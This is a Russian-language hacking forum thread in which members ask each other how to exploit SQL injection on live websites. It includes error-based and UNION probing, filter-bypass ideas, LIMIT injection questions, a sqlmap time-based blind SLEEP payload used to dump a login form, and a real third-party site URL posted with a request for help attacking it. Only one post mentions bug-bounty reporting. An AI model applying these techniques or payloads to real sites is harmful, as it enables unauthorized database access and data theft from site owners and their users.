Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. LexProm

    LexProm New Member

    Joined:
    15 May 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Ничего , разве что как-то заставить юзера прописать руками туда твой скрипт
     
  2. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    158
    Likes Received:
    41
    Reputations:
    2
    да, зарепортить на hackerone
    обычно в нормальных программах это стоит 1000+ уе
     
  3. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    172
    Reputations:
    119
    Запросят обоснование вектора атаки, а с ним тяжело...
     
  4. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,403
    Likes Received:
    882
    Reputations:
    859
    --thread=1 ?
     
    _________________________
  5. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    С чего вы взяли что должен быть результат. Кроме того что сайт русский, или что-то с кодировкой я не вижу ничего.
     
  6. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Есть inject с выводом. все стандартно:
    Code:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
    Найти количество колонок не проблема:
    Code:
    http://site.com/eng/index.php?param1=13123&param2=4aasd&param3=dasd&param4=28183 order by 1
    Когда пытаюсь провести union редиректит на index, но если использовать неправильно количество колонок, то опять ошибка:
    Code:
    The used SELECT statements have a different number of columns
    Есть у кого идеи как это обойти, потому что не могу ничего придумать.

    Кстати, когда использую невалидный параметр тоже происходит редирект.
     
  7. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Alright. Is there any way to install Opera 12 on Kali? cause I tried all kinds of way, but still no luck or do you run it on Windows?
    Sqlmap is not an option, because there are couple filters, which should be bypassed manually first.
     
  8. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,069
    Likes Received:
    1,565
    Reputations:
    40
    Много чего может быть, двойной запрос, ваф.... может ошибка и не должна пропадать
     
  9. BenderMR

    BenderMR Member

    Joined:
    23 Feb 2019
    Messages:
    65
    Likes Received:
    25
    Reputations:
    10
    Окей можно пойти по error based или extractvalue, но скобки фильтруются таким образом: когда закрытая пара -> срабатывает фильтр; когда одна или незакрытая, то все норм.
    По этому не могу ни одну функцию вызвать. Сталкивался с таким? Как такое вообще обойти может где то писали
     
  10. LexProm

    LexProm New Member

    Joined:
    15 May 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Возможно кто-то сталкивался, проблема в том что переданные параметры проходят сначала через функцию на стороне сервера которая поднимает их в верхний регистр
    Получаеться при передаче 'select * from table1' бд получает 'SELECT * FROM TABLE1', так как по дефолту бд чувствительно к регистру букв в названии таблиц возникает ошибка так как TABLE1 не существует, существует только table1
     
  11. mail156

    mail156 Banned

    Joined:
    28 Sep 2018
    Messages:
    467
    Likes Received:
    357
    Reputations:
    0
    Что такое javascript-скрипт из url b.scorecardresearch.com ?
     
  12. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    172
    Reputations:
    119
    Попробовать только select * from `table1` или select * from %74%61%62%6C%65%31
    Но в целом, вариант тупиковый. Если у кого есть годные решения, сам с удовольствием выслушаю.
     
  13. LexProm

    LexProm New Member

    Joined:
    15 May 2019
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Пробовал, в первом случае он так же поднимает в верхний регистр и обращаеться к `TABLE1` во втором он сначала декодирует потом так же апает
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,249
    Likes Received:
    428
    Reputations:
    233
    ХЕЛП
    Code:
    https://www.aknw.de/menu-oben-jobboerse-architektenliste/jobboerse/index.php?eID=getJobData&sSearch=&sSearch_6=&bRegex_6=false&iSortCol_0=0&iSortingCols=1&bSortable_0=true&bSortable_6=false&active=1&sEcho=2&iColumns=7&iDisplayLength=25&mDataProp_4=4&mDataProp_5=5&mDataProp_6=6&sSearch_0=&bRegex_5=0&pi=281&sSortDir_0=DESC
     
  15. Тот_самый_Щуп

    Тот_самый_Щуп Reservists Of Antichat

    Joined:
    23 Mar 2017
    Messages:
    265
    Likes Received:
    172
    Reputations:
    119
    Подскажите, есть ли на текущий момент вариант провести Mysql иньект в лимите, если версия Mysql > 5.6 ? Трюк с procedure analyse не прокатывает, но возможно есть ещё какие техники? Буду признателен, если кто подскажет.
     
  16. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    158
    Likes Received:
    41
    Reputations:
    2
    #2636 RWD, 9 Jun 2019
    Last edited: 9 Jun 2019
  17. madam

    madam Member

    Joined:
    27 Mar 2014
    Messages:
    129
    Likes Received:
    5
    Reputations:
    1
    После каждого SQL запроса
    Session halted.
    Сессия остановлена,как можно это решить,вводить капчу каждый раз муторно
     
    #2637 madam, 19 Jun 2019
    Last edited: 19 Jun 2019
  18. b3

    b3 Moderator

    Joined:
    5 Dec 2004
    Messages:
    2,027
    Likes Received:
    913
    Reputations:
    199
    Все заголовки отлавливать и использовать, возможно CSRF токен мешает
     
    _________________________
    madam likes this.
  19. AngelEyes

    AngelEyes New Member

    Joined:
    20 Jun 2019
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Parameter: useremail (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: useremail=Bqyn' AND (SELECT 6177 FROM (SELECT(SLEEP(10)))qdTp) AND 'sRZa'='sRZa&password=&signin=fgtI
    Скорость дампа просто ужасная!по 1 символу в минуту показывает.дописал --threads 10,но тогда перестало какие либо символы выдавать(<blank> везде)
    Подскажите новичку,можно ли это как-то фиксануть?Или же поставить на дамп и забыть на месяц?))
    [ERROR] invalid character detected. retrying..
    [WARNING] increasing time delay to 4 seconds
     
  20. RWD

    RWD Member

    Joined:
    25 Apr 2013
    Messages:
    158
    Likes Received:
    41
    Reputations:
    2
    если есть такое, вполне возможно есть и другие скули, поищите хорошо.
     
Loading...